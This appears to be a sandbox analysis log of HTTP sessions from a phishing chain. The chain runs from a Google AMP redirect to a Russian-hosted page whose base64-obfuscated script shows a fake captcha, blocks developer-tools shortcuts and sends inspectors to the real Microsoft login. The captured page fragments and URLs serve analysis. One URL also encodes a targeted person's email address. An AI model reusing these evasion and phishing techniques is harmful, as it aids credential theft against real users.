                                          Data Ascii: HTML>


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.549714216.58.206.674433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:23 UTC1114OUTGET /amp/growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20= HTTP/1.1
                                          Host: www.google.at
                                          Connection: keep-alive
                                          Upgrade-Insecure-Requests: 1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                          Sec-Fetch-Site: none
                                          Sec-Fetch-Mode: navigate
                                          Sec-Fetch-User: ?1
                                          Sec-Fetch-Dest: document
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          sec-ch-ua-platform: "Windows"
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          Cookie: NID=520=hgrMPCeFRKrCHnp1FKVMIVDcsy3rTAxBRPaPGughuS2uPXcxbDeM1fTLSnui4ttTuVBkfFc50RyHL4Tkua9kjpGAD2Q-gcMQESveF-0djBxXu85thCymyN-7vGw2UDBUCbD0g7ZzfDFkerXeHq52qw5tAs4Q0KCZ3gwCZfQeVPdN-0HKeYjgDipFAoTJjBIHopsy
                                          2025-01-08 15:13:23 UTC871INHTTP/1.1 302 Found
                                          Location: http://growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZWVicmljay5jb20=
                                          Cache-Control: private
                                          X-Robots-Tag: noindex
                                          Content-Type: text/html; charset=UTF-8
                                          Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-xBtSmxoHnRdRBjBtpOZA_A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                          Permissions-Policy: unload=()
                                          Date: Wed, 08 Jan 2025 15:13:23 GMT
                                          Server: gws
                                          Content-Length: 299
                                          X-XSS-Protection: 0
                                          X-Frame-Options: SAMEORIGIN
                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                          Connection: close
                                          2025-01-08 15:13:23 UTC299INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 67 72 6f 77 69 6e 67 66 38 74 68 2e 6f 72 67 2f 74 32 64 6f 6c 61 6c 72 77 65 2f 79 4e 52 4d 52 34 41 55 53 36 5a 79 58 4b 49 6c 62 6d 75 59 46 5a 38 50 59 6f 6c 2f 63 47 46 30 5a 53 35 79 62 33 64 6c 62 47 78 41 59 32 68 6c 63 6d 39 72 5a
                                          Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="http://growingf8th.org/t2dolalrwe/yNRMR4AUS6ZyXKIlbmuYFZ8PYol/cGF0ZS5yb3dlbGxAY2hlcm9rZ


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.549719104.21.33.34433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:25 UTC688OUTGET /mwAdur/ HTTP/1.1
                                          Host: rixolo.trilivar.ru
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          sec-ch-ua-platform: "Windows"
                                          Upgrade-Insecure-Requests: 1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: navigate
                                          Sec-Fetch-Dest: document
                                          Referer: http://growingf8th.org/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-08 15:13:26 UTC1242INHTTP/1.1 200 OK
                                          Date: Wed, 08 Jan 2025 15:13:26 GMT
                                          Content-Type: text/html; charset=UTF-8
                                          Transfer-Encoding: chunked
                                          Connection: close
                                          Cache-Control: no-cache, private
                                          cf-cache-status: DYNAMIC
                                          vary: accept-encoding
                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cCXuJ3ulaJII8fciFmfYvfyZLgLry%2FIu7S%2F5BfBkxYW2AIMRyeLLx1puIbcefjfHoYZRcmdvRauAbbBYWFHRyJlF49uN%2F71r3HO7xJwKW7HrXm4IvXaaUmYDJHz8Ag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                          alt-svc: h3=":443"; ma=86400
                                          server-timing: cfL4;desc="?proto=TCP&rtt=1127&min_rtt=1122&rtt_var=424&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1589&delivery_rate=2538324&cwnd=251&unsent_bytes=0&cid=e11b4b27b3c90d63&ts=454&x=0"
                                          Set-Cookie: XSRF-TOKEN=eyJpdiI6ImNzS1ZJdkxENGtoUElDUnRzNXoycFE9PSIsInZhbHVlIjoiVjA4bDNESk5nTFE0T1hCb2tZSlg1N3d1ZytCL29Zb3ZBSlQ5dHpCZnVFV3d2R0I2MEpuNmV2Nllnc2ZtenJRcm5Sb3d1empFWEtneUdDWnNqbTVJT3NTSkg0WGNzQUFPK05DUWxsdmc2ZHZMbWQzL3JPand6NER5L09LcHZ1ZWsiLCJtYWMiOiJkOThjYWQzYzk3ZDUyZmQyNGE1YmVjNzI0MWFlNjRjNmNhMDkyM2U2ZGVlMTQwNmZlZmFmODZlNDYzNzlkNzA1IiwidGFnIjoiIn0%3D; expires=Wed, 08-Jan-2025 17:13:25 GMT; Max-Age=7200; path=/; secure; samesite=none
                                          2025-01-08 15:13:26 UTC733INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6c 5a 51 4e 46 52 36 63 47 39 55 5a 31 70 79 59 6a 4a 43 5a 54 6c 54 4e 47 78 69 64 45 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 53 6a 4e 6f 54 47 35 4f 4d 48 5a 32 54 58 41 32 51 6c 5a 4b 4d 6d 39 30 61 44 56 43 4f 55 59 32 4d 48 6f 7a 63 46 42 4b 54 46 64 7a 62 6d 6f 77 53 47 39 53 4d 57 63 7a 52 31 59 33 63 6c 4e 42 59 55 5a 35 56 56 52 4a 54 69 39 49 55 54 5a 42 55 58 52 35 4f 57 56 57 55 32 6c 6b 54 31 41 31 5a 48 68 52 57 6c 56 50 61 6c 68 4b 63 47 64 6a 55 6d 46 6b 5a 55 46 4f 65 45 30 78 62 47 6c 53 53 48 63 35 4d 47 4a 4c 56 6e 64 46 65 54 4e 56 4b 32 31 6d 53 6c 70 4c 53 6c 56 77 4d 33 52 78 56 55 4d 32 56 6a 42 59 5a 46 55
                                          Data Ascii: Set-Cookie: laravel_session=eyJpdiI6IlZQNFR6cG9UZ1pyYjJCZTlTNGxidEE9PSIsInZhbHVlIjoiSjNoTG5OMHZ2TXA2QlZKMm90aDVCOUY2MHozcFBKTFdzbmowSG9SMWczR1Y3clNBYUZ5VVRJTi9IUTZBUXR5OWVWU2lkT1A1ZHhRWlVPalhKcGdjUmFkZUFOeE0xbGlSSHc5MGJLVndFeTNVK21mSlpLSlVwM3RxVUM2VjBYZFU
                                          2025-01-08 15:13:26 UTC1369INData Raw: 37 66 66 61 0d 0a 3c 21 2d 2d 20 54 68 65 20 72 6f 61 64 20 74 6f 20 73 75 63 63 65 73 73 20 61 6e 64 20 74 68 65 20 72 6f 61 64 20 74 6f 20 66 61 69 6c 75 72 65 20 61 72 65 20 61 6c 6d 6f 73 74 20 65 78 61 63 74 6c 79 20 74 68 65 20 73 61 6d 65 2e 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 54 68 65 20 73 65 63 72 65 74 20 6f 66 20 73 75 63 63 65 73 73 20 69 73 20 74 6f 20 64 6f 20 74 68 65 20 63 6f 6d 6d 6f 6e 20 74 68 69 6e 67 20 75 6e 63 6f 6d 6d 6f 6e 6c 79 20 77 65 6c 6c 2e 20 2d 2d 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 0d 0a 69 66 28 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 4f 62 69 35 30 63 6d 6c 73 61 58 5a 68 63 69 35 79 64 53 39 74 64 30 46 6b 64 58 49 76 22 29 20 3d 3d 20 22 6e 6f 6d 61 74 63 68 22 29 7b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72
                                          Data Ascii: 7ffa... The road to success and the road to failure are almost exactly the same. -->... The secret of success is to do the common thing uncommonly well. --><script>if(atob("aHR0cHM6Ly9Obi50cmlsaXZhci5ydS9td0FkdXIv") == "nomatch"){document.wr
                                          2025-01-08 15:13:26 UTC1369INData Raw: 30 4b 49 43 41 67 49 48 6f 74 61 57 35 6b 5a 58 67 36 49 44 45 37 44 51 6f 67 49 43 41 67 5a 47 6c 7a 63 47 78 68 65 54 6f 67 5a 6d 78 6c 65 44 73 4e 43 69 41 67 49 43 42 71 64 58 4e 30 61 57 5a 35 4c 57 4e 76 62 6e 52 6c 62 6e 51 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 69 41 67 49 43 42 68 62 47 6c 6e 62 69 31 70 64 47 56 74 63 7a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 49 43 41 67 49 47 68 6c 61 57 64 6f 64 44 6f 67 4d 54 41 77 4a 54 73 4e 43 69 41 67 49 43 42 6a 62 32 78 76 63 6a 6f 67 64 32 68 70 64 47 55 37 44 51 6f 67 49 43 41 67 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 41 79 4e 48 42 34 4f 77 30 4b 49 43 41 67 49 48 52 6c 65 48 51 74 59 57 78 70 5a 32 34 36 49 47 4e 6c 62 6e 52 6c 63 6a 73 4e 43 6e 30 4e 43 69 35 6a 59 58 42 30 59 32 68 68 4c
                                          Data Ascii: 0KICAgIHotaW5kZXg6IDE7DQogICAgZGlzcGxheTogZmxleDsNCiAgICBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsNCiAgICBhbGlnbi1pdGVtczogY2VudGVyOw0KICAgIGhlaWdodDogMTAwJTsNCiAgICBjb2xvcjogd2hpdGU7DQogICAgZm9udC1zaXplOiAyNHB4Ow0KICAgIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5jYXB0Y2hhL
                                          2025-01-08 15:13:26 UTC1369INData Raw: 37 44 51 6f 67 49 43 41 67 64 32 6c 6b 64 47 67 36 49 44 5a 77 65 44 73 4e 43 69 41 67 49 43 42 6f 5a 57 6c 6e 61 48 51 36 49 44 45 79 63 48 67 37 44 51 6f 67 49 43 41 67 59 6d 39 79 5a 47 56 79 4f 69 42 7a 62 32 78 70 5a 43 41 6a 4e 47 4e 68 5a 6a 55 77 4f 77 30 4b 49 43 41 67 49 47 4a 76 63 6d 52 6c 63 69 31 33 61 57 52 30 61 44 6f 67 4d 43 41 7a 63 48 67 67 4d 33 42 34 49 44 41 37 44 51 6f 67 49 43 41 67 64 48 4a 68 62 6e 4e 6d 62 33 4a 74 4f 69 42 79 62 33 52 68 64 47 55 6f 4e 44 56 6b 5a 57 63 70 4f 77 30 4b 66 51 30 4b 44 51 6f 75 59 32 46 77 64 47 4e 6f 59 53 31 30 5a 58 68 30 49 48 73 4e 43 69 41 67 49 43 42 6d 62 32 35 30 4c 57 5a 68 62 57 6c 73 65 54 6f 67 51 58 4a 70 59 57 77 73 49 48 4e 68 62 6e 4d 74 63 32 56 79 61 57 59 37 44 51 6f 67 49 43
                                          Data Ascii: 7DQogICAgd2lkdGg6IDZweDsNCiAgICBoZWlnaHQ6IDEycHg7DQogICAgYm9yZGVyOiBzb2xpZCAjNGNhZjUwOw0KICAgIGJvcmRlci13aWR0aDogMCAzcHggM3B4IDA7DQogICAgdHJhbnNmb3JtOiByb3RhdGUoNDVkZWcpOw0KfQ0KDQouY2FwdGNoYS10ZXh0IHsNCiAgICBmb250LWZhbWlseTogQXJpYWwsIHNhbnMtc2VyaWY7DQogIC
                                          2025-01-08 15:13:26 UTC1369INData Raw: 62 6d 63 36 49 44 56 77 65 44 73 4e 43 69 41 67 49 43 42 6d 62 32 35 30 4c 58 4e 70 65 6d 55 36 49 44 45 32 63 48 67 37 44 51 6f 67 49 43 41 67 64 47 56 34 64 43 31 68 62 47 6c 6e 62 6a 6f 67 59 32 56 75 64 47 56 79 4f 77 30 4b 66 51 30 4b 44 51 6f 75 59 32 46 77 64 47 4e 6f 59 53 31 6a 62 32 35 30 5a 57 35 30 49 47 4a 31 64 48 52 76 62 69 42 37 44 51 6f 67 49 43 41 67 63 47 46 6b 5a 47 6c 75 5a 7a 6f 67 4e 58 42 34 49 44 45 77 63 48 67 37 44 51 6f 67 49 43 41 67 5a 6d 39 75 64 43 31 7a 61 58 70 6c 4f 69 41 78 4e 6e 42 34 4f 77 30 4b 49 43 41 67 49 47 4a 68 59 32 74 6e 63 6d 39 31 62 6d 51 74 59 32 39 73 62 33 49 36 49 43 4d 30 51 30 46 47 4e 54 41 37 44 51 6f 67 49 43 41 67 59 32 39 73 62 33 49 36 49 48 64 6f 61 58 52 6c 4f 77 30 4b 49 43 41 67 49 47 4a
                                          Data Ascii: bmc6IDVweDsNCiAgICBmb250LXNpemU6IDE2cHg7DQogICAgdGV4dC1hbGlnbjogY2VudGVyOw0KfQ0KDQouY2FwdGNoYS1jb250ZW50IGJ1dHRvbiB7DQogICAgcGFkZGluZzogNXB4IDEwcHg7DQogICAgZm9udC1zaXplOiAxNnB4Ow0KICAgIGJhY2tncm91bmQtY29sb3I6ICM0Q0FGNTA7DQogICAgY29sb3I6IHdoaXRlOw0KICAgIGJ
                                          2025-01-08 15:13:26 UTC1369INData Raw: 44 30 39 50 53 41 34 4e 53 6b 67 66 48 77 4e 43 69 41 67 49 43 41 67 49 43 41 67 4b 47 56 32 5a 57 35 30 4c 6d 4e 30 63 6d 78 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 63 32 68 70 5a 6e 52 4c 5a 58 6b 67 4a 69 59 67 5a 58 5a 6c 62 6e 51 75 61 32 56 35 51 32 39 6b 5a 53 41 39 50 54 30 67 4e 7a 4d 70 49 48 78 38 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 68 6c 64 6d 56 75 64 43 35 6a 64 48 4a 73 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6e 4e 6f 61 57 5a 30 53 32 56 35 49 43 59 6d 49 47 56 32 5a 57 35 30 4c 6d 74 6c 65 55 4e 76 5a 47 55 67 50 54 30 39 49 44 59 33 4b 53 42 38 66 41 30 4b 49 43 41 67 49 43 41 67 49 43 41 6f 5a 58 5a 6c 62 6e 51 75 59 33 52 79 62 45 74 6c 65 53 41 6d 4a 69 42 6c 64 6d 56 75 64 43 35 7a 61 47 6c 6d 64 45 74 6c
                                          Data Ascii: D09PSA4NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzMpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDY3KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtl
                                          2025-01-08 15:13:26 UTC1369INData Raw: 52 61 52 58 63 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 48 42 50 65 58 52 76 64 33 68 33 53 6e 63 67 50 53 42 30 63 6e 56 6c 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 52 6b 52 46 53 55 39 72 52 46 70 46 64 79 41 39 49 48 52 79 64 57 55 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 33 61 57 35 6b 62 33 63 75 62 47 39 6a 59 58 52 70 62 32 34 75 63 6d 56 77 62 47 46 6a 5a 53 67 6e 61 48 52 30 63 48 4d 36 4c 79 39 73 62 32 64 70 62 69 35 74 61 57 4e 79 62 33 4e 76 5a 6e 52 76 62 6d 78 70 62 6d 55 75 59 32 39 74 4a 79 6b 37 44 51 6f 67 49 43 41 67 49 43 41 67 49 48 30 4e 43 69 41 67 49 43 42 39 4c 43 41 78 4d 44 41 70 4f 77 30 4b 66 53 6b 6f 4b 54 73 4e 43 69 41 67 49 43 41 38 4c 33 4e 6a 63 6d 6c 77 64
                                          Data Ascii: RaRXcpIHsNCiAgICAgICAgICAgIHBPeXRvd3h3SncgPSB0cnVlOw0KICAgICAgICAgICAgRkRFSU9rRFpFdyA9IHRydWU7DQogICAgICAgICAgICB3aW5kb3cubG9jYXRpb24ucmVwbGFjZSgnaHR0cHM6Ly9sb2dpbi5taWNyb3NvZnRvbmxpbmUuY29tJyk7DQogICAgICAgIH0NCiAgICB9LCAxMDApOw0KfSkoKTsNCiAgICA8L3Njcmlwd
                                          2025-01-08 15:13:26 UTC1369INData Raw: 6c 50 53 4a 69 62 48 52 6b 61 58 41 69 49 48 5a 68 62 48 56 6c 50 53 4a 56 62 6d 74 75 62 33 64 75 49 6a 34 4e 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 44 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 6c 6b 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 75 59 57 31 6c 50 53 4a 69 62 48 52 6b 63 6d 56 6d 49 69 42 32 59 57 78 31 5a 54 30 69 61 48 52 30 63 44 6f 76 4c 32 64 79 62 33 64 70 62 6d 64 6d 4f 48 52 6f 4c 6d 39 79 5a 79 38 69 50 67 30 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 50 47 6c 75 63 48 56 30 49 48 52 35 63 47 55 39 49 6d 68 70 5a 47 52 6c 62 69 49 67 61 57 51 39 49 6d 4a 73 64 47 52 31 59 53 49 67 62 6d 46 74 5a 54 30 69 59 6d 78 30 5a 48 56 68 49 69 42 32 59 57 78 31 5a 54 30 69 56 57
                                          Data Ascii: lPSJibHRkaXAiIHZhbHVlPSJVbmtub3duIj4NCiAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJoaWRkZW4iIGlkPSJibHRkcmVmIiBuYW1lPSJibHRkcmVmIiB2YWx1ZT0iaHR0cDovL2dyb3dpbmdmOHRoLm9yZy8iPg0KICAgICAgICAgICAgPGlucHV0IHR5cGU9ImhpZGRlbiIgaWQ9ImJsdGR1YSIgbmFtZT0iYmx0ZHVhIiB2YWx1ZT0iVW
                                          2025-01-08 15:13:26 UTC1369INData Raw: 43 69 41 67 49 43 41 67 49 43 41 67 66 51 30 4b 49 43 41 67 49 48 30 70 4f 77 30 4b 66 53 6b 37 44 51 6f 4e 43 6d 4e 76 62 6e 4e 30 49 47 4e 68 62 6e 5a 68 63 79 41 39 49 47 52 76 59 33 56 74 5a 57 35 30 4c 6d 64 6c 64 45 56 73 5a 57 31 6c 62 6e 52 43 65 55 6c 6b 4b 43 4a 6a 59 58 42 30 59 32 68 68 51 32 46 75 64 6d 46 7a 49 69 6b 37 44 51 70 6a 62 32 35 7a 64 43 42 6a 64 48 67 67 50 53 42 6a 59 57 35 32 59 58 4d 75 5a 32 56 30 51 32 39 75 64 47 56 34 64 43 67 69 4d 6d 51 69 4b 54 73 4e 43 67 30 4b 5a 6e 56 75 59 33 52 70 62 32 34 67 5a 32 56 30 55 6d 46 75 5a 47 39 74 53 57 35 30 4b 47 31 70 62 69 77 67 62 57 46 34 4b 53 42 37 44 51 6f 67 49 43 41 67 63 6d 56 30 64 58 4a 75 49 45 31 68 64 47 67 75 5a 6d 78 76 62 33 49 6f 54 57 46 30 61 43 35 79 59 57 35
                                          Data Ascii: CiAgICAgICAgfQ0KICAgIH0pOw0KfSk7DQoNCmNvbnN0IGNhbnZhcyA9IGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJjYXB0Y2hhQ2FudmFzIik7DQpjb25zdCBjdHggPSBjYW52YXMuZ2V0Q29udGV4dCgiMmQiKTsNCg0KZnVuY3Rpb24gZ2V0UmFuZG9tSW50KG1pbiwgbWF4KSB7DQogICAgcmV0dXJuIE1hdGguZmxvb3IoTWF0aC5yYW5
                                          2025-01-08 15:13:26 UTC1369INData Raw: 44 41 73 49 44 49 31 4e 53 6c 39 4c 43 41 77 4c 6a 55 70 59 44 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 59 33 52 34 4c 6d 5a 70 62 47 77 6f 4b 54 73 4e 43 69 41 67 49 43 42 39 44 51 70 39 44 51 6f 4e 43 6d 5a 31 62 6d 4e 30 61 57 39 75 49 47 52 79 59 58 64 53 59 57 35 6b 62 32 31 46 62 47 78 70 63 48 4e 6c 63 79 68 6a 64 48 67 73 49 47 56 73 62 47 6c 77 63 32 56 44 62 33 56 75 64 43 6b 67 65 77 30 4b 49 43 41 67 49 47 5a 76 63 69 41 6f 62 47 56 30 49 47 6b 67 50 53 41 77 4f 79 42 70 49 44 77 67 5a 57 78 73 61 58 42 7a 5a 55 4e 76 64 57 35 30 4f 79 42 70 4b 79 73 70 49 48 73 4e 43 69 41 67 49 43 41 67 49 43 41 67 59 33 52 34 4c 6d 4a 6c 5a 32 6c 75 55 47 46 30 61 43 67 70 4f 77 30 4b 49 43 41 67 49 43 41 67 49 43 42 6a 64 48 67 75 5a 57 78 73 61 58 42 7a
                                          Data Ascii: DAsIDI1NSl9LCAwLjUpYDsNCiAgICAgICAgY3R4LmZpbGwoKTsNCiAgICB9DQp9DQoNCmZ1bmN0aW9uIGRyYXdSYW5kb21FbGxpcHNlcyhjdHgsIGVsbGlwc2VDb3VudCkgew0KICAgIGZvciAobGV0IGkgPSAwOyBpIDwgZWxsaXBzZUNvdW50OyBpKyspIHsNCiAgICAgICAgY3R4LmJlZ2luUGF0aCgpOw0KICAgICAgICBjdHguZWxsaXBz


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.549721151.101.66.1374433092C:\Program Files\Google\Chrome\Application\chrome.exe
                                          TimestampBytes transferredDirectionData
                                          2025-01-08 15:13:26 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                          Host: code.jquery.com
                                          Connection: keep-alive
                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                          sec-ch-ua-mobile: ?0
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                          sec-ch-ua-platform: "Windows"
                                          Accept: */*
                                          Sec-Fetch-Site: cross-site
                                          Sec-Fetch-Mode: no-cors
                                          Sec-Fetch-Dest: script
                                          Referer: https://rixolo.trilivar.ru/
                                          Accept-Encoding: gzip, deflate, br
                                          Accept-Language: en-US,en;q=0.9
                                          2025-01-08 15:13:26 UTC613INHTTP/1.1 200 OK
                                          Connection: close
                                          Content-Length: 89501
                                          Server: nginx
                                          Content-Type: application/javascript; charset=utf-8
                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                          ETag: "28feccc0-15d9d"
                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                          Access-Control-Allow-Origin: *
                                          Cross-Origin-Resource-Policy: cross-origin
                                          Via: 1.1 varnish, 1.1 varnish
                                          Accept-Ranges: bytes
                                          Age: 1833732
                                          Date: Wed, 08 Jan 2025 15:13:26 GMT
                                          X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740026-EWR
                                          X-Cache: HIT, HIT
                                          X-Cache-Hits: 2774, 0
                                          X-Timer: S1736349207.725777,VS0,VE1
                                          Vary: Accept-Encoding
                                          2025-01-08 15:13:26 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                          2025-01-08 15:13:26 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                          Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
